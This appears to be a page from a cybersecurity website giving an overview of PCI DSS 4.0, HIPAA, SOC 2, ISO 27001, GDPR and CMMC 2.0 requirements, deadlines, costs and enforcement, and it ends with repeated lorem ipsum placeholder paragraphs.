Compliance Regulations
Contact Us
Browse cybersecurity research, threat data, attack techniques, statistics, and compliance guides on CyberSanso. Free to use, updated regularly.
Compliance Research Hub: PCI DSS 4.0, HIPAA, SOC 2, ISO 27001, and GDPR
Compliance and security are related but not identical. Compliance means meeting the minimum requirements of a specific regulatory framework or standard. Security means actually reducing the likelihood and impact of breaches. The most dangerous misconception in cybersecurity is that compliance equals security: organizations that achieve certification but lack the underlying security controls to make those certifications meaningful are well-documented sources of significant breaches.
CyberSanso’s Compliance Research Hub covers the regulatory frameworks security teams encounter most frequently in enterprise environments: PCI DSS 4.0 for payment card data, HIPAA for healthcare information, SOC 2 for SaaS and service providers, ISO 27001 for internationally certifiable information security management, GDPR for EU personal data, and CMMC 2.0 for US defense contractors. Each section explains what the framework requires, who it applies to, what the audit or certification process looks like, and what the penalties for non-compliance are.
Compliance requirements are not static. PCI DSS moved from v3.2.1 to v4.0 in March 2022 with a hard compliance deadline of March 31, 2025 for all requirements – organizations still operating under the 3.2.1 framework are out of compliance. CMMC 2.0 rulemaking finalized in late 2024, making CMMC certification enforceable for US defense contractors in 2025. GDPR enforcement has accelerated significantly: Meta received a record 1.2 billion euro fine in 2023 and enforcement actions continue to increase in frequency and size.
PCI DSS 4.0: Payment Card Compliance Requirements
PCI DSS (Payment Card Industry Data Security Standard) 4.0 applies to any organization that stores, processes, or transmits payment card data. It is mandated by the card brands (Visa, Mastercard, American Express, Discover) and enforced through merchant agreements, not government legislation – but non-compliance can result in fines, increased transaction fees, and ultimately loss of the ability to process card payments.
PCI DSS 4.0 key changes from v3.2.1: The major structural change in v4.0 is the introduction of the customized approach as an alternative to the defined approach for all 12 requirements. Under the customized approach, organizations can implement controls that differ from the prescribed defined approach, provided they can demonstrate that the customized control meets the stated objective and undergoes enhanced testing by a QSA. Multi-factor authentication requirements expanded significantly: MFA is now required for all access into the cardholder data environment, not only administrative access. Password length requirements increased from 7 to 12 characters minimum. Targeted risk analysis is required to justify the frequency of all activities that previously had prescriptive schedules. Anti-phishing controls (DMARC, DKIM, SPF) are now explicitly required for email domains used in merchant communications. Web application security requirements expanded to address client-side scripting threats (Magecart-style attacks).
Compliance deadlines: PCI DSS v4.0 was released March 2022. The previous version (v3.2.1) retired March 31, 2024. All organizations must now comply with PCI DSS v4.0. Requirements designated as “future-dated” in the original release became mandatory March 31, 2025 – including the expanded MFA requirements, web application security requirements, and targeted risk analysis requirements. Organizations that have not yet addressed these requirements are currently out of compliance with the standard.
Scope reduction: PCI DSS scope – the systems and processes subject to its requirements – is one of the most complex aspects of compliance. Organizations can reduce scope through network segmentation (isolating cardholder data environments from out-of-scope systems), tokenization (replacing card data with tokens before storage), and using point-to-point encryption (P2PE) solutions that prevent card data from reaching merchant systems at all. A QSA (Qualified Security Assessor) determines scope during assessment – scope decisions directly impact compliance cost.
- PCI DSS 4.0 requirements with March 2025 compliance deadline details
- HIPAA Security Rule: technical, physical, and administrative safeguards
- SOC 2 Type 1 vs Type 2: what each report proves and to whom
- ISO 27001 and GDPR: certification and regulatory compliance guidance
HIPAA, SOC 2, and ISO 27001: Healthcare, SaaS, and Enterprise Compliance
HIPAA Security Rule: The HIPAA Security Rule requires covered entities (healthcare providers, health plans, healthcare clearinghouses) and their business associates to implement administrative, physical, and technical safeguards to protect electronic protected health information (ePHI). Technical safeguards require: access controls limiting ePHI access to authorized users, audit controls recording access and activity on systems containing ePHI, integrity controls ensuring ePHI has not been improperly altered or destroyed, and transmission security protecting ePHI in transit. HIPAA does not prescribe specific technologies – it defines required capabilities that organizations must implement through appropriate means. The average HIPAA data breach costs $7.42 million – the highest of any sector globally for the 15th consecutive year (IBM 2025). Healthcare organizations should reference the HIPAA Security Risk Assessment tool from HHS.gov and the NIST 800-66r2 guidance for HIPAA implementation.
SOC 2: SOC 2 (System and Organization Controls 2) is an audit framework developed by the American Institute of CPAs (AICPA) that evaluates service providers’ controls related to security, availability, processing integrity, confidentiality, and privacy. SOC 2 Type 1 reports assess whether controls are suitably designed at a specific point in time. SOC 2 Type 2 reports assess whether those controls operated effectively over a defined period (typically 6 to 12 months). Enterprise customers consistently request SOC 2 Type 2 reports because Type 1 only demonstrates design, not operation. SOC 2 is particularly important for SaaS companies, managed service providers, and cloud infrastructure providers. Implementation typically takes 6 to 12 months for initial Type 2 coverage. Cost ranges from $30,000 to $100,000+ depending on scope and auditor.
ISO 27001: ISO/IEC 27001:2022 is the international standard for Information Security Management Systems (ISMS). Unlike SOC 2, ISO 27001 is internationally recognized and accepted by enterprise customers across geographies. Certification involves implementing an ISMS, conducting internal audits, completing a Stage 1 documentation review by an accredited certification body, and a Stage 2 audit assessing implementation effectiveness. Initial certification typically takes 12 to 18 months and costs $25,000 to $80,000 for small to mid-size organizations. Surveillance audits occur annually; full recertification every three years. ISO 27001 maps closely to SOC 2 Trust Service Criteria – organizations often pursue both simultaneously to serve US and international markets.
GDPR: Data Protection Compliance for Organizations Handling EU Personal Data
The GDPR (General Data Protection Regulation) applies to any organization that processes personal data of EU residents – regardless of where the organization is headquartered. A US company with EU website visitors processing their behavioral data, a Canadian SaaS provider with EU enterprise customers, or an Australian company with EU employees all fall within GDPR scope.
GDPR Article 32 security requirements: Article 32 requires appropriate technical and organizational security measures commensurate with the risk to data subjects. Explicitly mentioned measures include pseudonymization and encryption of personal data, ensuring ongoing confidentiality, integrity, availability, and resilience of processing systems, the ability to restore data availability and access in a timely manner following a physical or technical incident, and a process for regularly testing and evaluating security measures. Article 32 does not prescribe specific controls – it requires a risk-proportionate approach that organizations must document and justify.
Data breach notification: GDPR Article 33 requires notification to the relevant supervisory authority within 72 hours of becoming aware of a personal data breach that is likely to result in risk to individuals. Article 34 requires direct notification to affected individuals when the breach is likely to result in high risk. These timelines are significantly shorter than US state breach notification laws (which typically allow 30 to 90 days) and require breach detection and response processes that can identify, assess, and escalate incidents within the notification window.
GDPR enforcement trends: GDPR enforcement has accelerated significantly. Meta received a 1.2 billion euro fine in 2023 for transferring EU user data to the US without adequate protections. Total GDPR fines exceeded 4 billion euros through 2024, with the volume and size of fines increasing year-over-year as supervisory authorities build their capacity and coordination. The Irish Data Protection Commission (which handles GDPR enforcement for companies like Meta, Google, and Apple with their EU headquarters in Ireland) and the French CNIL have been the most active enforcement authorities.
CMMC 2.0 and US Defense Contractor Compliance
The Cybersecurity Maturity Model Certification (CMMC) 2.0 is the US Department of Defense’s mandatory cybersecurity compliance framework for defense industrial base (DIB) contractors. CMMC rulemaking finalized in late 2024, making it enforceable in contracts awarded from 2025 onward.
CMMC 2.0 levels: CMMC 2.0 simplified the original five-level model to three levels. Level 1 (Foundational) applies to contractors handling only Federal Contract Information (FCI) – 17 basic practices from FAR 52.204-21, requiring annual self-assessment. Level 2 (Advanced) applies to contractors handling Controlled Unclassified Information (CUI) – 110 practices from NIST SP 800-171, requiring triennial third-party assessments for most contracts (with priority contracts requiring annual third-party assessments). Level 3 (Expert) applies to contractors working on the most critical DoD programs – 24 additional practices from NIST SP 800-172 on top of Level 2, requiring government-led assessments.
NIST 800-171 as the foundation: CMMC Level 2 is built on NIST SP 800-171 Rev 2, which provides 110 security requirements across 14 control families. Organizations that have implemented NIST 800-171 and achieved a SPRS (Supplier Performance Risk System) score approaching 110 are well-positioned for CMMC Level 2 certification. The 14 control families cover: Access Control, Awareness and Training, Audit and Accountability, Configuration Management, Identification and Authentication, Incident Response, Maintenance, Media Protection, Personnel Security, Physical Protection, Risk Assessment, Security Assessment, System and Communications Protection, and System and Information Integrity.
Who needs CMMC: Any prime contractor or subcontractor in the defense industrial base that handles FCI or CUI must achieve the appropriate CMMC level for the data they handle. This applies to software companies, manufacturers, research organizations, and service providers in the defense supply chain. Companies that have historically relied on self-attestation of NIST 800-171 compliance must now either achieve and maintain an assessed score or obtain third-party certification. The rollout is phased across DoD contract types.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.
Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.